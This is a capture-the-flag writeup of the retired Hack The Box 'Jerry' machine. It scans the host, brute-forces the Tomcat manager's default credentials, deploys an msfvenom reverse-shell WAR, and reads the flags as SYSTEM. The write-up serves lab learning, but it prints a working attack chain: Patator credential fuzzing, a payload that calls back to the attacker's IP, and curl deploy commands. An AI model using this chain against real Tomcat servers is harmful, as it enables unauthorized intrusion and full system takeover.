Hack The Box Jerry Writeup

Published:
September 9, 2024

This is a writeup for the retired Hack The Box Jerry machine.

Solution Summary

Solution

The following steps are needed to retrieve the flags:

  1. Find out frequently used default passwords for Tomcat instances.
  2. Craft a reverse shell payload using Metasploit’s msfvenom.
  3. Upload the reverse shell payload using Tomcat’s deploy mechanism and launch the reverse shell
  4. Read out the flags from the Administrator’s desktop.

Nmap

Did you know that on Linux, ping is run as a setuid binary? Now that I know, it makes sense. Ping needs to send out raw (non-TCP) packets. Handling raw sockets required the CAP_NET_RAW capability on Linux.

For example, the specific code that configures ping to be a setuid binary in NixOS can be found here.

# Nmap seems to be a bit stubborn without sudo, as it appears to think the host
# is down otherwise and blocking ping probes
sudo nmap -sV -sC -A -oX machines/jerry/nmap.xml \
  10.10.10.95
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:38 JST
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   291.39 ms 10.10.16.1
2   291.38 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds

To be sure we don’t miss any TCP ports, we run a second TCP-only scan:

sudo nmap -p- -sT -oX machines/jerry/nmap_tcp.xml 10.10.10.95

We don’t find any other open ports after running an exhaustive scan:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:44 JST
Nmap scan report for 10.10.10.95
Host is up (0.084s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Findings:

Apache Tomcat

Landing page of Jerry’s Apache Tomcat

Landing page of Jerry’s Apache Tomcat Open in new tab (full image size 117 KiB)

Apache Tomcat version 7.0.88 was released in 2018. There are a lot of vulnerabilities.

Three vulnerabilities look interesting because they are low-complexity and can lead to an RCE.

It turns out that, luckily, we can make use of a much easier vulnerability, as we will see below.

We try to identify interesting URLs:

feroxbuster --wordlist SecLists/Discovery/Web-Content/common.txt \
  --threads 10 --scan-limit 1 \
  --url http://10.10.10.95:8080 --silent | tee machines/jerry/feroxbuster.log

The following URL sticks out:

http://10.10.10.95:8080/manager/html

Cracking the admin panel password

Why don’t we brute-force our way into the admin panel located at /manager/html? Here’s what we see when we try to access it without any authentication:

curl http://10.10.10.95:8080/manager/html -I

We get a 401 status code with Basic authentication required hinted at in the WWW-Authenticate header.

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 02:00:00 EET
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Mon, 09 Sep 2024 09:15:37 GMT

We try to fuzz the password using Patator.

patator.py http_fuzz \
  url=http://10.10.10.95:8080/manager/html \
  method=GET \
  0=SecLists/Usernames/cirt-default-usernames.txt \
  1=SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt \
  user_pass=FILE0:FILE1 \
  -x ignore:code=401

admin:admin does the trick and we are logged in. tomcat:s3cret also seems to work.

Logged in admin screen

Logged in admin screen Open in new tab (full image size 114 KiB)

Uploading a reverse shell

From /docs/manager-howto.html:

http://localhost:8080/manager/text/deploy?path=/foo

Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.

We craft a shell using msfvenom:

msfvenom --payload java/jsp_shell_reverse_tcp \
  --platform windows --arch x86 \
  LHOST=10.10.16.6 \
  LPORT=4444 \
  -f war > machines/jerry/msfvenom_shell.war

Then, we use CURL to upload the msfvenom_shell.war shell created above:

curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \
  --upload-file machines/jerry/msfvenom_shell.war

The upload works:

OK - Deployed application at context path /shell

We launch Socat locally:

socat -d TCP4-LISTEN:4444 STDIO
# Somewhere else
curl http://10.10.10.95:8080/shell/

Retrieve flags

The shell works and we are already a privileged user:

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
nt authority\system

We find the flags on the Administrator’s desktop:

dir C:\Users\Administrator\Desktop\flags\
06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,397,736,960 bytes free

Print out the flags:

type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

The flags are revealed:

user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index